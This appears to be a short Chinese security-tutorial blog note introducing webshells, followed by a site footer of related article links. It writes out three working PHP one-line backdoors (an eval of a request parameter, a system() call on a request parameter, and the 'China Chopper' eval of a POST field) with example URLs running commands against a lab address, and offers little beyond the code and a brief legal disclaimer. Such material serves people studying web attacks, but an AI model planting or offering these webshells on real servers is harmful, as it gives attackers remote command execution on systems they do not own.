32、webshell简介

简介: 32、webshell简介

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。


一、eval,使用PHP函数,例如phpinfo()


1、把下面内容写入1.php文件

<?php eval($_REQUEST['cmd']);?>

2、访问该文件

http://192.168.152.128/1.php?cmd=phpinfo();

0a2653c851af460fa595bd959398a8f1.png

二、system,使用系统命令,例如:dir(win),ls(linux)


1、把下面内容写入1.php文件

<?php system($_REQUEST['cmd']);?>

2、访问该文件

http://192.168.152.128/1.php?cmd=dir;

0eacb84100b54626af849e6b562bf92a.png

三、菜刀一句话


1、把下面内容写入1.php文件

<?php @eval($_POST['abc']);?>

2、在菜刀添加该文件路径,点击添加

2d65d23f6d4748949b924e4057485923.png

3、双击网址进入

4cebaac233b3433da32a72337a77fc60.png

6de278e6d6694ce5bb08e7e842b7e74b.png

禁止非法,后果自负

目录
相关文章
|
9月前
|
安全 前端开发 JavaScript
某教程学习笔记(一):06、漏洞分析(工具篇)
某教程学习笔记(一):06、漏洞分析(工具篇)
86 0
|
开发框架 安全 .NET
冰蝎WebShell免杀工具(支持4.0.6)
冰蝎WebShell免杀工具(支持4.0.6)
701 0
|
安全 测试技术 网络安全
如何使用Metasploit进行漏洞利用?
如何使用Metasploit进行漏洞利用?
264 0
|
开发框架 Java .NET
32、webshell简介
32、webshell简介
125 0
32、webshell简介
|
安全 PHP
pikachu靶场通过秘籍之PHP反序列化漏洞攻击
pikachu靶场通过秘籍之PHP反序列化漏洞攻击
261 0
|
开发框架 安全 Java
某教程学习笔记(一):13、脚本木马原理
某教程学习笔记(一):13、脚本木马原理
120 0
某教程学习笔记(一):13、脚本木马原理
|
开发框架 安全 JavaScript
某教程学习笔记(一):14、上传漏洞讲解
某教程学习笔记(一):14、上传漏洞讲解
112 0
某教程学习笔记(一):14、上传漏洞讲解
|
存储 安全 JavaScript
某教程学习笔记(一):16、XSS漏洞
某教程学习笔记(一):16、XSS漏洞
155 0
某教程学习笔记(一):16、XSS漏洞
|
网络安全
渗透测试-dirb使用教程-web目录爆破
渗透测试-dirb使用教程-web目录爆破
渗透测试-dirb使用教程-web目录爆破
|
安全 关系型数据库 MySQL
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)

热门文章

最新文章